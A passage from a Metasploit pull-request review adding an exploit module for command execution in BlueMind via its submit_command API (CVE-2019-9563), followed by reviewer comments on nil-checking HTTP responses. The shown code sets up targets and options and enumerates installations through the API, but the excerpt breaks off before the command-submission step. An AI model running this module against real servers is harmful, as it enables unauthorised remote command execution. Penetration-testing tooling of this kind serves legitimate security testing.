modules/exploits/multi/http/bluemind_api_submit_command.rb

```diff
@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'json'
+require 'securerandom'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "BlueMind submit_command API Command Execution",
+      'Description'    => %q{
+        Command Execution on BlueMind through the submit_command API.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'Damien Picard <damien.picard[at]synacktiv.com>',
+        'Julien Szlamowicz <julien.szlamowicz[at]synacktiv.com>'
+      ],
+      'References' =>
+      [
+        ['CVE' , '2019-9563']
+      ],
+      'Targets' => [
+        [
+          'Unix CMD', {
+            'Platform' => %w{ unix },
+            'Arch' => [ ARCH_CMD ]
+          }
+        ],
+        [
+          'Linux x86', {
+            'Platform' => %w{ linux },
+            'Arch' => [ ARCH_X86 ]
+          }
+        ],
+        [
+          'Linux x64', {
+            'Platform' => %w{ linux },
+            'Arch' => [ ARCH_X64 ]
+          }
+        ],
+      ],
+      'DisclosureDate' => 'Mar 4 2019'
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base BlueMind URI', '/']),
+        OptString.new('APIKEY', [true, 'The BlueMind core api token']),
+        OptString.new('INSTALLATION_ID', [false, 'The BlueMind installation id on which to run command']),
+        OptString.new('SERVER_ID', [false, 'The BlueMind server id on which to run command'])
+      ])
+  end
+
+  def get_installation_id
+    if datastore['INSTALLATION_ID'].nil?
+      installation_id = uniq_and_notify(list_installations(), "server")
+    else
+      installation_id = datastore['INSTALLATION_ID']
+    end
+    return installation_id
+  end
+
+  def get_server_id(installation_id)
+    if datastore['SERVER_ID'].nil?
+      server_id = uniq_and_notify(list_servers(installation_id), "server")
+    else
+      server_id = datastore['SERVER_ID']
+    end
+    return server_id
+  end
+
+  def uniq_and_notify(collection, name)
+    item = collection[0]['uid']
+    if collection.count > 1
+      vprint_status("Found #{collection.count} #{name} ids")
+      collection.each { |c| vprint_status(" * #{c['uid']}") }
+      vprint_status("Using: #{item}")
+    end
+    return item
+  end
+
+  def list_installations
+    resp = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'api', 'containers', '_manage', '_list'),
+      'headers' => {'X-BM-ApiKey' => datastore['APIKEY']},
+      'data' => '{"type": "installation", "verb": ["All"]}'
+    })
+    return JSON.parse(resp.body)
```

Comment:
`resp` could be `nil`, so try checking that before accessing the response body. The responses should be checked in `list_servers()`, `submit_command()`, and `submit_command_and_wait()` as well.

Reply:
Given that the methods which consume this method (and the other methods below) are expecting a Hash, a lazy approach would be to use the rescue-from-method approach and simply return an empty Hash, then check the return value wherever its used.

```ruby
def mymethod
  return JSON.parse(something that isnt valid json and will fail horribly. perhaps `nil` or something)
rescue => e
  {}
end
```

Althoguh a quick skim read through the code indicates that the return value isn't used. :shrug: